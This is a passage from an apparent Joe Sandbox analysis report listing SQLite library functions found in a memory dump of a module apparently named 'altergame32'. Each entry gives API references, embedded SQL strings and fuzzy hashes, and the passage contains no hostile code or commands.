                                                                  • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                  • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                  • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                  Function 6090F435 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                  • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                  • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                  • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                  Function 6096C598 Relevance: 51.2, APIs: 22, Strings: 7, Instructions: 417COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                    • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                  • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                  • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                  • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                  • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                  • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                  • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                  • API String ID: 1320758876-2501389569
                                                                  • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                  • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                  • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                  • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                  Function 60926471 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                  • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                  • API String ID: 937752868-2111127023
                                                                  • Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                  • Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
                                                                  • Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                  • Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
                                                                  Function 6094844A Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 374COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                  • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                  • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                  • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                  • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                  • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                  • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                  • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                  • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                  • BEGIN;, xrefs: 609485DB
                                                                  • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                  • API String ID: 632333372-52344843
                                                                  • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                  • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                  • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                  • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                  Function 609602C8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                    • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                    • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                    • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                    • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                    • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                    • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                  • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                  • sqlite3_free.SQLITE3 ref: 609605EA
                                                                  • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                  • sqlite3_free.SQLITE3 ref: 60960618
                                                                  • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                  • String ID: offsets
                                                                  • API String ID: 463808202-2642679573
                                                                  • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                  • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                  • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                  • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                  Function 6091A3AA Relevance: 16.7, APIs: 11, Instructions: 175COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                  • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                  • String ID:
                                                                  • API String ID: 2903785150-0
                                                                  • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                  • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                  • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                  • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                  Function 60912453 Relevance: 15.2, APIs: 10, Instructions: 247COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                  • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                  • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                  • String ID:
                                                                  • API String ID: 3556715608-0
                                                                  • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                  • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                  • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                  • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                  Function 6091C159 Relevance: 14.0, Strings: 11, Instructions: 290COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                  • API String ID: 0-780898
                                                                  • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                  • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                  • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                  • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                  Function 609061F1 Relevance: 13.9, Strings: 11, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                  • API String ID: 0-2604012851
                                                                  • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                  • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                  • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                  • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                  Function 6095F004 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                  • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                  • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                  • sqlite3_free.SQLITE3 ref: 6095F180
                                                                    • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                    • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                  • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                    • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                  • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                  • String ID: |
                                                                  • API String ID: 1576672187-2343686810
                                                                  • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                  • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                  • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                  • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                  Function 6095D3BB Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                    • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                  • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                  • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                  • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                  • API String ID: 652164897-1572359634
                                                                  • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                  • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                  • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                  • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                  Function 6091B05A Relevance: 12.3, APIs: 8, Instructions: 349COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                  • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                  • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                  • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                  • String ID:
                                                                  • API String ID: 2352520524-0
                                                                  • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                  • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                  • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                  • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                  Function 6096A481 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                    • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                    • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
